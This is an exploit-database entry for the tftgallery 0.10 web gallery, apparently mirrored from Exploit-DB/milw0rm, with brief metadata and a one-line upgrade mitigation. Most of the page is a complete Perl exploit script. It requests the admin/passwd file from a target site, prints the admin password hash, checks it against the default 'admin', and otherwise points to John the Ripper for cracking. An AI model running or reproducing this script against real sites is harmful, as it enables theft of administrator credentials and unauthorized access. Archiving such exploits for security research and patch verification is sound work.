tftgallery 0.10 exploit

vendor:

tftgallery

by:

undefined1_

7,5

CVSS

HIGH

Password Hash Disclosure

200

CWE

Product Name: tftgallery

Affected Version From: 0.10

Affected Version To: 0.10

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

undefined1_

This exploit allows an attacker to retrieve the admin password hash from the tftgallery 0.10 application. The exploit sends a GET request to the admin/passwd page and retrieves the password hash from the response. The plaintext password can then be retrieved using John the Ripper.

Mitigation:

Upgrade to the latest version of tftgallery.

Source

Exploit-DB raw data:

#!/usr/bin/perl

###############################################################################
#Copyright (C) undefined1_
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; either version 2
#of the License, or (at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
###############################################################################

use strict; 
use IO::Socket;

$| = 1;
printf ":: tftgallery 0.10 exploit - by undefined1_ @ bash-x.net/undef/ ::\n\n\n";


my $website = shift || usage();

my $path = "/";
my $site = $website;
if(index($website, "/") != -1)
{
	my $index = index($website, "/");
	$path = substr($website, $index);
	$site = substr($website, 0, $index);
	if(substr($path, length($path)-1) ne "/")
	{
		$path .= "/";
	}
}


my $eop = "\r\nHost: $site\r\n";
$eop .= "User-Agent: Mozilla/5.0\r\n";
$eop .= "Connection: close\r\n\r\n";


my $packet1 = "GET ".$path."admin/passwd HTTP/1.1";
my $data = sendpacket($site, $packet1.$eop);

if($data !~ /HTTP\/1.1 200 OK/)
{
	die "failed to retrieve the admin password\n";
}

my $password = "";
if (index($data, "\r\n\r\n") != -1)
{
	$password = substr($data, index($data, "\r\n\r\n")+4);
	chomp $password;
}
else
{
	die "failed to retrieve the admin password\n";
}

print "The password hash is: '$password'\n";
if(crypt("admin","tftgallery") eq $password)
{
	print "The plaintext password is: 'admin'\n";		
}
else
{
	die "Use john the ripper, luke!\n";
}




sub sendpacket(\$,\$) {
	my $server = shift;
	my $request = shift;

	my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => "80") or die "[-] Could not connect to $server:80 $!\n";
	print $sock "$request";

	
	my $data = "";
	my $answer;
	while($answer = <$sock>)
	{
		$data .= $answer;
	}
	
	close($sock);
	return $data;
}

sub usage() {
	printf "usage: %s <website> [password]\n", $0;
	printf "ex. : %s www.site.com/tftgallery/\n", $0;
	exit;
}

# milw0rm.com [2006-03-25]